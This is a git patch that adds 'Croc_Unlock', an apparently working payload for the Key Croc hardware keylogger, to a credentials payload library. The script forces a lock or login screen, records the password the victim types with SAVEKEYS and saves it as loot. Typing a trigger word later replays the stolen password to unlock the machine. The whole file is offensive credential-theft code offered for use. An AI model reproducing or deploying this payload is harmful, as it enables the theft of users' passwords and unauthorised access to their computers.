From 5013b1059d71ed304ccd125ceeb04c793c708769 Mon Sep 17 00:00:00 2001
From: spywill <spywill@gmail.com>
Date: Fri, 9 Dec 2022 03:30:25 -0500
Subject: [PATCH] Create Croc_Unlock.txt

Pressing GUI-l will open windows / linux parrot OS login screen and wait for user to enter passwd with SAVEKEYS command
Type in crocunlock at the target login screen will delete crocunlock characters and enter user passwd
NOTE: This payload is relying on the ENTER key to be press after user has enter passwd
---
 .../credentials/Croc_Unlock/Croc_Unlock.txt   | 96 +++++++++++++++++++
 1 file changed, 96 insertions(+)
 create mode 100644 payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt

diff --git a/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt b/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt
new file mode 100644
index 0000000..807b2e6
--- /dev/null
+++ b/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt
@@ -0,0 +1,96 @@
+# Title:           Croc_Unlock
+# Description:     Save target passwd with SAVEKEYS command by pressing GUI-l or CONTROL-ALT-F3
+#                  Log in with typing crocunlock, save at /loot/Croc_Pot/Croc_unlock.txt.filtered and /tools/Croc_Pot/Croc_unlock.txt.filtered
+# Author:          Spywill / RootJunky
+# Version:         2.0
+# Category:        Key Croc
+
+MATCH (crocunlock|GUI-l|CONTROL-ALT-F3)
+
+UNLOCK_TMP="/tmp/unlock_Count.txt"
+
+if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
+	LED B
+else
+	mkdir -p /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot
+fi
+
+UNLOCK_FILE() {
+	until [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; do
+		:
+	done
+	LED G
+	Q DELAY 5000
+	LED OFF
+}
+
+UNLOCK_COUNT() {
+	if [ -f ${UNLOCK_TMP} ]; then
+		i=$(sed -n 1p ${UNLOCK_TMP})
+		echo $(( $i + 1 )) > ${UNLOCK_TMP}
+		RELOAD_PAYLOADS
+	else
+		echo $(( i++ )) > ${UNLOCK_TMP}
+		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+			cat /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered >> /root/udisk/loot/Croc_Pot/Croc_unlock.txt.filtered
+			rm -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered /root/udisk/tools/Croc_Pot/Croc_unlock.txt
+		fi
+	fi
+	Q DELAY 1000
+}
+
+case $LOOT in
+	GUI-l)
+		UNLOCK_COUNT
+		Q KEYCODE 00,00,2c
+		if [ "$(sed -n 1p ${UNLOCK_TMP})" -eq "0" ]; then
+SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
+			LED ATTACK
+			UNLOCK_FILE
+		else
+			RELOAD_PAYLOADS
+			UNLOCK_FILE
+		fi
+;;
+	CONTROL-ALT-F3)
+		UNLOCK_COUNT
+		if [ "$(sed -n 1p ${UNLOCK_TMP})" -eq "0" ]; then
+			if [ -f /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt ]; then
+				Q STRING "$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)"
+				Q ENTER
+				Q DELAY 1000
+SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
+				LED ATTACK
+				UNLOCK_FILE
+			fi
+		else
+			RELOAD_PAYLOADS
+			UNLOCK_FILE
+		fi
+;;
+	crocunlock)
+		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+			$(sed -i -e 's/'`sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt`'//g' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+			$(sed -i -e 's/crocunlock//g' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+			LED G
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q DELAY 1000
+			Q STRING "$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)"
+			Q ENTER
+			LED OFF
+			RELOAD_PAYLOADS
+		else
+			LED R
+			RELOAD_PAYLOADS
+		fi
+;;
+esac